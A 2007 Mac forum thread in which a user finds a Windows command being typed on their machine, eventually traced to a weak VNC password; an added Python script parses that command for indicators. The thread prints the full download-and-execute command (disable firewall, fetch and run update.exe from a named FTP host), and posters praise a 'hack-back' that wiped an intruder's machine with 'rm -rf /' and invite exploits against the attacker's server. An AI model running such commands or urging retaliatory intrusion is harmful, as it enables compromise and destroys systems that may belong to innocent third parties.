OS X worm?

Discussion in 'macOS' started by vd0t, May 22, 2007.

  1. vd0t macrumors regular

    Joined:
    Jun 7, 2005
    #1
    I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

    cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

    I don't think it will do any damage as it looks like its meant for Windows (look at update.exe). But I'm puzzled as to how it got to or runs on my Mac!

    How do I get rid of this?

    Thanks!
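The pasted text above is a Windows FTP-script "download and execute" chain, apparently injected over a remote session with the shifted keys lost (it reads as '7' where '&' was meant, '..' for '>>' and ';' for ':'; that mapping is an assumption based on a US keyboard layout). As an added triage example, not code from the thread, the following Python normalises that transcription and extracts the indicators a defender would put in an abuse report:

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class DropperIndicators:
    ftp_host: Optional[str] = None
    ftp_port: Optional[int] = None
    fetched_files: List[str] = field(default_factory=list)
    executed_files: List[str] = field(default_factory=list)
    disables_firewall: bool = False

    @property
    def is_download_execute(self) -> bool:
        return bool(self.ftp_host and self.fetched_files and self.executed_files)

def normalise(cmd: str) -> str:
    """Undo the shift-lost transcription seen in the post (assumed US layout):
    '..' stands for '>>', ' 7' before a word for ' &', and '-s;' for '-s:'."""
    cmd = cmd.replace("..", ">>")
    cmd = re.sub(r"(?<=\s)7(?=[a-z])", "&", cmd)
    return re.sub(r"-s;(\w+)", r"-s:\1", cmd)

def triage(cmd: str) -> DropperIndicators:
    """Extract indicators from a Windows FTP-script download-and-execute chain."""
    ind = DropperIndicators()
    cmd = normalise(cmd)
    host = re.search(r"echo\s+open\s+(\S+)\s+(\d+)", cmd, re.I)
    if host:
        ind.ftp_host, ind.ftp_port = host.group(1), int(host.group(2))
    ind.fetched_files = re.findall(r"echo\s+get\s+(\S+)", cmd, re.I)
    # SharedAccess is the Windows Firewall / Internet Connection Sharing service.
    ind.disables_firewall = bool(re.search(r"net\s+stop\s+sharedaccess", cmd, re.I))
    # A fetched file that later appears as its own command segment is executed.
    segments = [s.strip().lower() for s in re.split(r"[&|]+", cmd)]
    ind.executed_files = [f for f in ind.fetched_files if f.lower() in segments]
    return ind

# The injected text as pasted in the post, with shifted characters lost.
LOGGED = ("cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij "
          "7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij "
          "7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit")

if __name__ == "__main__":
    r = triage(LOGGED)
    print(f"download-and-execute: {r.is_download_execute}; firewall stopped: {r.disables_firewall}")
    print(f"fetch {r.fetched_files} from {r.ftp_host}:{r.ftp_port}; run {r.executed_files}")
```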
     
  2. Scarlet Fever macrumors 68040

    Scarlet Fever

    Joined:
    Jul 22, 2005
    Location:
    Bookshop!
    #2
    typed where? how did you get it? what programs are affected?

    more info needed before the people with torches and pitchforks start their riots :p
     
  3. wrldwzrd89 macrumors G5

    wrldwzrd89

    Joined:
    Jun 6, 2003
    Location:
    Solon, OH
    #3
    Check your Login Items (located under System Preferences -> Accounts) for anything strange running at startup. Also check your cron tables (an application like Cronnix makes this task much easier) and your launchd settings (use Lingon for this purpose) for anything set to automatically launch that you don't want launched.
     
  4. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #4
    abuse@dyndns.com

    some idiot's trying to do windows-y stuff on your mac. i suggest you mail whatever you're getting those from to the above email address.

    On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

    I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. i ssh'd into one of those from a different computer logged in as root and deleted everything. like rm -rf / kind of everything. eventually the connection was reset, probably cause the computer restarted :D
     
  5. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #5
    It's typed anywhere! So if I have TextEdit open, it will type it there. If the cursor is in a file - it will rename that file. If I'm watching a movie in QuickTime, it will attempt to type (I hear the keyboard beep sound).

    I looked through my login items and don't see anything suspicious.
     
  6. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #6
    can you look through the Activity Monitor to see any weirdly named apps running? Or something like "ps aux > ~/Desktop/processes.txt"... and post "processes.txt" here...
     
  7. synth3tik macrumors 68040

    synth3tik

    Joined:
    Oct 11, 2006
    Location:
    Minneapolis, MN
    #7

    That is just so beautiful....:)
     
  8. johnee macrumors 6502a

    johnee

    #8
    maybe you should close ALL apps, and post a list of all processes running for everyone to review.
     
  9. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #9
    although i was being stupid about the easy-to-guess password (it was a throwaway account for testing), the guy was stupider for leaving behind so many passwords and sshing as root. i would have seen it eventually, but the first thing that tipped me off was little snitch blocking all sorts of stuff that only I'd usually be using. the guy even tried to use wget to download a copy of openssh to use..well, little snitch would block that too :D

    i just sat around watching what he was doing until he stopped..then i deleted stuff. it was the funniest thing ever.
     
  10. Queso macrumors G4

    Joined:
    Mar 4, 2006
    #10
    The hostname resolves to 72.244.39.101, which is registered to an ISP named Covad Communications in San Jose, California.

    E-mail address to report abuse is abuse-isp@covad.com

    Unfortunately this particular user does not have Telnet or SSH running, but the FTP software identifies itself as "Serv-U FTP-Server v2.5e for WinSock" if anyone knows any exploits :)
     
  11. iBlue macrumors Core

    iBlue

    Joined:
    Mar 17, 2005
    Location:
    London, England
    #11
    I like your style. :D That. is. brilliant.
     
  12. localoid macrumors 68020

    localoid

    Joined:
    Feb 20, 2007
    Location:
    America's Third World
    #12
    This sounds something like W32.Kenety, which is a worm that affects Windows systems. Are you on a local network shared with any Windows machines?
     
  13. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #13
    I don't see anything suspicious in Activity Monitor.

    I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But it still doesn't really make sense to me.

    I have to leave for work and will look more into this when I get home.
     
  14. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #14
    THAT IS ABSOLUTELY BEAUTIFUL!

    Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.

    VNC is the attack vector. Do you have a password set for it? Good lord, plug that hole before he realizes that you're running a *NIX and starts using the appropriate commands!
     
  15. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #15
    I changed the password to my VNC server. It seems like everything is ok now.
     
  16. headfuzz macrumors 6502

    headfuzz

    Joined:
    Apr 13, 2007
    Location:
    Brighton, UK
    #16
    That really is precious :D
     
  17. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #17
    If your password for VNC was the same for any other services you use, I would strongly advise changing them as well. STRONGLY.
     
  18. CanadaRAM macrumors G5

    CanadaRAM

    Joined:
    Oct 11, 2004
    Location:
    On the Left Coast - Victoria BC Canada
    #18
    OK Gang, Everybody repeat after me:

    "As the very first thing I do on installation, I will change the default passwords on all of my security devices (Router/Firewall, VNC, etc. etc.)."
     
  19. janey macrumors 603

    janey

    Joined:
    Dec 20, 2002
    Location:
    sunny los angeles
    #19
    :D

    it wasn't really backhacking...and there wasn't anything in terms of actual user data that i could see except suspicious looking files, some of which the idiot was trying to get onto my box.
     
  20. vd0t thread starter macrumors regular

    Joined:
    Jun 7, 2005
    #20
    I originally chose a short password - which I've used in the past with no problems. But now I changed it to something stronger. Lesson learned! Thanks all!
     